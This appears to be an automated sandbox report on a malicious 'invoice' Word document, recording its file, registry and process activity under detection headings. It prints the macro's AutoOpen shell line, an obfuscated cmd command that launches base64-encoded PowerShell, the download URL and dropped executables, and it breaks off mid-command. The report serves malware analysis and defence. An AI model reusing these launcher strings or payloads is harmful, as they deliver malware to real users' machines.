Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

barindex
Tries to open an application configuration file (.cfg)Show sources
Source: C:\Windows\System32\helphome.exeFile opened: C:\Windows\system32\helphome.cfg
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Binary contains paths to development resourcesShow sources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Source: WINWORD.EXEBinary or memory string: 3.vbP.v
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.phis.spyw.troj.win@28/12@66/47
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\wget.exeFile created: C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVRDEB.tmp
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handlesShow sources
Source: C:\Windows\System32\helphome.exeSystem information queried: HandleInformation
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Windows\System32\wget.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wget.exe wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/'
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkA
Source: unknownProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: unknownProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: unknownProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknownProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknownProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: unknownProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: unknownProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknownProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: unknownProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: unknownProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: unknownProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\helphome.exeFile created: C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Creates mutexesShow sources
Source: C:\Windows\System32\helphome.exeMutant created: \BaseNamedObjects\MB714DB14
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I5FDD0DB5
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeMutant created: \Sessions\1\BaseNamedObjects\M366742AD
Source: C:\Windows\System32\helphome.exeMutant created: \BaseNamedObjects\Global\I5FDD0DB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeMutant created: \BaseNamedObjects\M784CCE09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M5FDD0DB5
Reads the hosts fileShow sources
Source: C:\Windows\System32\wget.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\helphome.exeFile read: C:\Windows\System32\drivers\etc\hosts
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Client- 9650, Oct 2017 Invoice.doc.0.drOLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processesShow sources
Source: Client- 9650, Oct 2017 Invoice.doc.0.drOLE, VBA macro line: Shell$ "cmd /V /C " + Chr(34) + AhauqDMCW + OuOjFiFSOi + isaoqEowD + sKQKcZluLAi + bEpjbthcIB + IJWkoH + kXazjCnaicA + hONMw + OAVSw + HhLKRh + ORArVOiMokQ + GJPbsZ + rHCJYKza + GYuczAQ + sNzTCSAn + BuZYwvVTDE + FNnTtLA + ikoAVkzdnu + khucWwV + fPzjvS + FbLAAAVBYc + AumiwEiq + qQLASCdKY + XNbqBEEwC + MjkGkLpvv + JzDjW + UpWGblMKvm + aPzjIG + CiGJzHciMsD + MHjlkiA + SKoFt + QlloEEB + UwjzTvbdDE + RFWVKwprTad + NRprJawSGUm + AaUEZrR + WSwWK + tzKFG + OZsad + HQwEUW + sWVdAiYl + bpTbIQkqRA + QAWZlHZfv + rDLYQQ + cPfwRSK + RYpsoQmwkZ + uqFPj + YjkAmtoaUG, 0
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 6274
Source: unknownProcess created: Commandline size = 6199
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 6274
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6199

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: WINWORD.EXEBinary or memory string: Progman
Source: WINWORD.EXEBinary or memory string: Program Manager
Source: WINWORD.EXEBinary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe 'C:\Users\user~1\AppData\Local\Temp\16994.exe'
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeProcess created: C:\Users\user~1\AppData\Local\Temp\16994.exe C:\Users\user~1\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeProcess created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe C:\Windows\system32\helphome.exe
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\wget.exe wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 